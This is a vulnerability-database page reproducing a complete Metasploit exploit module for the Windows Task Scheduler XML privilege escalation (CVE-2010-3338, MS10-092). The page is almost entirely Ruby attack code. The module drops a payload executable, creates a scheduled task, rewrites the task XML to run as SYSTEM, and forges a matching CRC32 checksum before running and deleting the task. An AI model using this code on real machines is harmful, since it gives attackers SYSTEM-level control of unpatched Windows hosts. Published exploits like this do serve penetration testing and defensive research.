Microsoft Windows - Task Scheduler '.XML' Local Privilege Escalation (MS10-092) (Metasploit)

🗓️ 19 Jul 2012 00:00:00Reported by MetasploitType

Windows Task Scheduler XML Privilege Escalation for Windows Vista, 7, and 2008. Exploits the Task Scheduler 2.0 XML 0day to execute arbitrary commands with SYSTEM privileges. Uses CRC32 collision to tamper with task files

Reporter	Title	Published	Views	Family All 16
0day.today	Windows Escalate Task Scheduler XML Privilege Escalation	21 Jul 201200:00	–	zdt
Circl	CVE-2010-3338	20 Nov 201000:00	–	circl
CVE	CVE-2010-3338	16 Dec 201019:00	–	cve
Cvelist	CVE-2010-3338	16 Dec 201019:00	–	cvelist
Metasploit	Windows Escalate Task Scheduler XML Privilege Escalation	13 Jun 201205:58	–	metasploit
NVD	CVE-2010-3338	16 Dec 201019:33	–	nvd
OpenVAS	Microsoft Windows Task Scheduler Elevation of Privilege Vulnerability (2305420)	15 Dec 201000:00	–	openvas
OpenVAS	Microsoft Windows Task Scheduler Elevation of Privilege Vulnerability (2305420)	15 Dec 201000:00	–	openvas
Packet Storm	Windows Escalate Task Scheduler XML Privilege Escalation	19 Jul 201200:00	–	packetstorm
Prion	Design/Logic Flaw	16 Dec 201019:33	–	prion

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/post/common'
require 'rex'
require 'zlib'


class Metasploit3 < Msf::Exploit::Local

	include Msf::Exploit::EXE
	include Msf::Post::Common
	include Msf::Post::File

	def initialize(info={})
		super(update_info(info, {
			'Name'          => 'Windows Escalate Task Scheduler XML Privilege Escalation',
			'Description'   => %q{
					This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
				When processing task files, the Windows Task Scheduler only uses a CRC32
				checksum to validate that the file has not been tampered with. Also, In a default
				configuration, normal users can read and write the task files that they have
				created. By modifying the task file and creating a CRC32 collision, an attacker
				can execute arbitrary commands with SYSTEM privileges.

				NOTE: Thanks to webDEViL for the information about disable/enable.
			},
			'License'       => MSF_LICENSE,
			'Author'        => [ 'jduck' ],
			'Version'       => '$Revision$',
			'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
			'Platform'      => [ 'windows' ],
			'SessionTypes'  => [ 'meterpreter' ],
			'Targets'       =>
				[
					[ 'Windows Vista, 7, and 2008', {} ],
				],
			'References'    =>
				[
					[ 'OSVDB', '68518' ],
					[ 'CVE', '2010-3338' ],
					[ 'BID', '44357' ],
					[ 'MSB', 'MS10-092' ],
					[ 'EDB', 15589 ]
				],
			'DisclosureDate'=> 'Sep 13 2010',
			'DefaultTarget' => 0
		}))

		register_options([
			OptString.new("CMD",      [ false, "Command to execute instead of a payload" ]),
			OptString.new("TASKNAME", [ false, "A name for the created task (default random)" ]),
		])

	end

	def check
		vuln = false
		winver = sysinfo["OS"]
		affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ]
		affected.each { |v|
			if winver.include? v
				vuln = true
				break
			end
		}
		if not vuln
			return Exploit::CheckCode::Safe
		end

		return Exploit::CheckCode::Appears
	end

	def exploit
		if sysinfo["Architecture"] =~ /wow64/i
			#
			# WOW64 Filesystem Redirection prevents us opening the file directly. To make matters
			# worse, meterpreter/railgun creates things in a new thread, making it much more
			# difficult to disable via Wow64EnableWow64FsRedirection. Until we can get around this,
			# offer a workaround and error out.
			#
			print_error("Running against via WOW64 is not supported, try using an x64 meterpreter...")
			return
		end

		if check == Exploit::CheckCode::Safe
			print_error("#{winver} is not vulnerable.")
			return
		end

		taskname = datastore["TASKNAME"] || nil
		cmd = datastore["CMD"] || nil
		upload_fn = nil

		tempdir = session.fs.file.expand_path("%TEMP%")
		if not cmd
			# Get the exe payload.
			exe = generate_payload_exe
			#and placing it on the target in %TEMP%
			tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
			cmd = tempdir + "\\" + tempexename + ".exe"

			print_status("Preparing payload at #{cmd}")
			write_file(cmd, exe)
		else
			print_status("Using command: #{cmd}")
		end

		#
		# Create a new task to do our bidding, but make sure it doesn't run.
		#
		taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
		sysdir = session.fs.file.expand_path("%SystemRoot%")
		taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"

		print_status("Creating task: #{taskname}")
		cmdline = "schtasks.exe /create /tn #{taskname} /tr \"#{cmd}\" /sc monthly /f"
#		print_debug("Will Execute:\n\t#{cmdline}")
		exec_schtasks(cmdline, "create the task")

		#
		# Read the contents of the newly creates task file
		#
		content = read_task_file(taskname, taskfile)

		#
		# Double-check that we got what we expect.
		#
		if content[0,2] != "\xff\xfe"
			#
			# Convert to unicode, since it isn't already
			#
			content = content.unpack('C*').pack('v*')
		else
			#
			# NOTE: we strip the BOM here to exclude it from the crc32 calculation
			#
			content = content[2,content.length]
		end


		#
		# Record the crc32 for later calculations
		#
		old_crc32 = crc32(content)
		print_status("Original CRC32: 0x%x" % old_crc32)

		#
		# Convert the file contents from unicode
		#
		content = content.unpack('v*').pack('C*')

		#
		# Mangle the contents to now run with SYSTEM privileges
		#
		content.gsub!('LeastPrivilege', 'HighestAvailable')
		content.gsub!(/<UserId>.*<\/UserId>/, '<UserId>S-1-5-18</UserId>')
		content.gsub!(/<Author>.*<\/Author>/, '<Author>S-1-5-18</Author>')
		#content.gsub!('<LogonType>InteractiveToken</LogonType>', '<LogonType>Password</LogonType>')
		content.gsub!('Principal id="Author"', 'Principal id="LocalSystem"')
		content.gsub!('Actions Context="Author"', 'Actions Context="LocalSystem"')
		content << "<!-- ZZ -->"

		#
		# Convert it back to unicode
		#
		content = Rex::Text.to_unicode(content)

		#
		# Fix it so the CRC matches again
		#
		fix_crc32(content, old_crc32)
		new_crc32 = crc32(content)
		print_status("Final CRC32: 0x%x" % new_crc32)

		#
		# Write the new content back
		#
		print_status("Writing our modified content back...")
		fd = session.fs.file.new(taskfile, "wb")
		fd.write "\xff\xfe" + content
		fd.close

		#
		# Validate our results
		#
		print_status("Validating task: #{taskname}")
		exec_schtasks("schtasks.exe /query /tn #{taskname}", "validate the task")

		#
		# Run the task :-)
		#
		print_status("Disabling the task...")
		exec_schtasks("schtasks.exe /change /tn #{taskname} /disable", "disable the task")

		print_status("Enabling the task...")
		exec_schtasks("schtasks.exe /change /tn #{taskname} /enable", "enable the task")

		print_status("Executing the task...")
		exec_schtasks("schtasks.exe /run /tn #{taskname}", "run the task")


		#
		# And delete it.
		#
		print_status("Deleting the task...")
		exec_schtasks("schtasks.exe /delete /f /tn #{taskname}", "delete the task")
	end

	def crc32(data)
		table = Zlib.crc_table
		crc = 0xffffffff
		data.unpack('C*').each { |b|
			crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
		}
		crc
	end

	def fix_crc32(data, old_crc)
		#
		# CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
		# reversed from Microsoft's code)
		#
		bwd_table = [
			0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
			0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
			0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
			0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
			0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
			0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
			0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
			0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
			0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
			0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
			0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
			0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
			0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
			0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
			0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
			0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
			0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
			0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
			0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
			0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
			0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
			0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
			0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
			0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
			0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
			0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
			0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
			0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
			0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
			0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
			0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
			0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
			0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
			0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
			0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
			0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
			0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
			0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
			0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
			0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
			0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
			0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
			0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
			0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
			0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
			0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
			0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
			0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
			0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
			0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
			0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
			0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
			0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
			0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
			0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
			0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
			0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
			0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
			0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
			0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
			0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
			0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
			0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
			0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
		]

		crc = crc32(data[0, data.length - 12])
		data[-12, 4] = [crc].pack('V')

		data[-12, 12].unpack('C*').reverse.each { |b|
			old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
		}
		data[-12, 4] = [old_crc].pack('V')
	end

	def exec_schtasks(cmdline, purpose)
		cmdline = "/c #{cmdline.strip} && echo SCHELEVATOR"
		lns = cmd_exec('cmd.exe', cmdline)

		success = false
		lns.each_line { |ln|
			ln.chomp!
			if ln =~ /^SUCCESS\:\s/
				success = true
				print_status(ln)
			else
				print_status(ln)
			end
		}
	end


	def read_task_file(taskname, taskfile)
		print_status("Reading the task file contents from #{taskfile}...")

		# Can't read the file directly on 2008?
		content = ''
		fd = session.fs.file.new(taskfile, "rb")
		until fd.eof?
			content << fd.read
		end
		fd.close

		content
	end

end

19 Jul 2012 00:00Current

7High risk

Vulners AI Score7

CVSS 27.2

EPSS0.6037

Microsoft Windows - Task Scheduler &#039;.XML&#039; Local Privilege Escalation (MS10-092) (Metasploit)

Microsoft Windows - Task Scheduler '.XML' Local Privilege Escalation (MS10-092) (Metasploit)